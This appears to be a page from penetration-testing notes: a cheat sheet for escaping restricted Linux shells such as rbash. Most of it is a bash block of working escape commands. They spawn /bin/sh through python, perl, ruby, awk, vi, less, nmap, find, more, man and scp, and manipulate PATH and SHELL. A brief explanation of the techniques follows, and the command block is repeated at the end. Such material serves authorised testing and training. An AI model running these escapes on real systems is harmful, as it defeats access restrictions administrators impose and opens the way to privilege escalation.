6.Escaping-restricted-shells

Restricted Shell Escape Attempts

```bash
# 1. Check the restricted shell type (if possible)
# (Often, this is not directly visible)

# 2. Enumerate allowed commands (try common ones)
ls
pwd
whoami
id
echo $PATH
env
# Try other basic commands

# 3. Test command substitution
ls -l `pwd`
ls -l $(pwd)
echo `whoami`
echo $(whoami)

# 4. Test command chaining
ls; whoami
pwd && id
echo 1 || echo 2
cat /etc/passwd | grep root

# 5. Test environment variable manipulation (if possible)
echo $PATH
export PATH=/bin:/usr/bin:/sbin:/usr/sbin
echo $PATH
echo $SHELL
export SHELL=/bin/bash
$SHELL # Try to spawn a new shell

# 6. Test shell function creation (if possible)
function test { /bin/bash; }
test

# 7. Try common escape binaries (if available)
sh
bash
python -c 'import os; os.system("/bin/sh")'
perl -e 'exec "/bin/sh";'
ruby -e 'exec "/bin/sh"'
awk 'BEGIN {system("/bin/sh")}'
vi
nano
tmux
screen
less /etc/passwd # Then !/bin/sh
nmap --interactive # Then !sh
find / -exec /bin/sh \; 

# 8. If vi is available
vi
# Then:
# :!/bin/sh
# or
# :set shell=/bin/bash
# :shell

# 9. GTFObins Check (Manual - Check allowed binaries against GTFObins)
# Example: If 'more' is allowed, check GTFObins for 'more'
# Example: If 'scp' is allowed, check GTFObins for 'scp'
# Example: If 'man' is allowed, check GTFObins for 'man'

# Example: If 'more' is allowed, and GTFObins shows an escape:
more /etc/passwd
:!/bin/sh

# Example: If 'man' is allowed, and GTFObins shows an escape:
man man
:!/bin/sh

# Example: If 'scp' is allowed, and GTFObins shows an escape:
scp user@host:/dev/null /dev/null -S /bin/sh

Understanding Restricted Shells

Purpose:
- Limit user capabilities for security.
- Prevent accidental or intentional system damage.
- Control access to specific system features.
Common Types:
- rbash (Restricted Bourne shell)
- rksh (Restricted Korn shell)
- rzsh (Restricted Z shell)
Restrictions:
- Limited command execution.
- Restricted directory access.
- Disabled environment variable modification.
- Prevented shell function creation.

Escaping Techniques

The document outlines several methods, which can be summarized and expanded upon:

Command Injection:
- Exploiting vulnerabilities where user input is directly used in command execution.
- Example: ls -l \pwd`` (using backticks for command substitution).
- This is very dependent on the specific implementation of the restricted shell.
Command Substitution:
- Using backticks () or $(command)` to execute commands within other commands.
- If the restricted shell allows any form of command substitution, it can often be abused.
Command Chaining:
- Using ;, &&, ||, or | to execute multiple commands in sequence.
- If the shell allows any of these, it may be possible to chain an allowed command with an escape command.
Environment Variables:
- Manipulating variables like PATH or SHELL to execute unauthorized commands.
- If the shell allows any modification of environment variables, this is a very common method of escape.
Shell Functions:
- Defining custom functions to bypass restrictions.
- If function definitions are possible, this is a very powerful way to escape.

Practical Considerations

Specific Restrictions: The effectiveness of these techniques depends entirely on the specific restrictions imposed by the restricted shell.
Enumeration: Thoroughly enumerate the shell's limitations. What commands are allowed? What environment variables exist?
Binary Exploitation: If standard escape methods fail, consider if any allowed binaries have known vulnerabilities.
GTFObins: GTFObins is an excellent resource for finding ways to abuse common Linux binaries. Many of these techniques can be used to escape restricted shells.
Common Escape Commands:
- sh, bash, python, perl, ruby, awk, vi, nano, tmux, screen and many more. If any of these are available, they are very often used to escape.

Example scenarios and commands

If vi is available: :!/bin/sh
If Python is available: python -c 'import os; os.system("/bin/sh")'
If Perl is available: perl -e 'exec "/bin/sh";'
If less is available: !/bin/sh
If nmap is available: !sh inside of an interactive nmap session.
If find is available: find / -exec /bin/sh \;

Previous5.Wildcard-abuse Next3.Permissions-based Privilege Escalation

Last updated 12 days ago

Restricted Shell Escape Attempts ```bash # 1. Check the restricted shell type (if possible) # (Often, this is not directly visible) # 2. Enumerate allowed commands (try common ones) ls pwd whoami id echo $PATH env # Try other basic commands # 3. Test command substitution ls -l `pwd` ls -l $(pwd) echo `whoami` echo $(whoami) # 4. Test command chaining ls; whoami pwd && id echo 1 || echo 2 cat /etc/passwd | grep root # 5. Test environment variable manipulation (if possible) echo $PATH export PATH=/bin:/usr/bin:/sbin:/usr/sbin echo $PATH echo $SHELL export SHELL=/bin/bash $SHELL # Try to spawn a new shell # 6. Test shell function creation (if possible) function test { /bin/bash; } test # 7. Try common escape binaries (if available) sh bash python -c 'import os; os.system("/bin/sh")' perl -e 'exec "/bin/sh";' ruby -e 'exec "/bin/sh"' awk 'BEGIN {system("/bin/sh")}' vi nano tmux screen less /etc/passwd # Then !/bin/sh nmap --interactive # Then !sh find / -exec /bin/sh \; # 8. If vi is available vi # Then: # :!/bin/sh # or # :set shell=/bin/bash # :shell # 9. GTFObins Check (Manual - Check allowed binaries against GTFObins) # Example: If 'more' is allowed, check GTFObins for 'more' # Example: If 'scp' is allowed, check GTFObins for 'scp' # Example: If 'man' is allowed, check GTFObins for 'man' # Example: If 'more' is allowed, and GTFObins shows an escape: more /etc/passwd :!/bin/sh # Example: If 'man' is allowed, and GTFObins shows an escape: man man :!/bin/sh # Example: If 'scp' is allowed, and GTFObins shows an escape: scp user@host:/dev/null /dev/null -S /bin/sh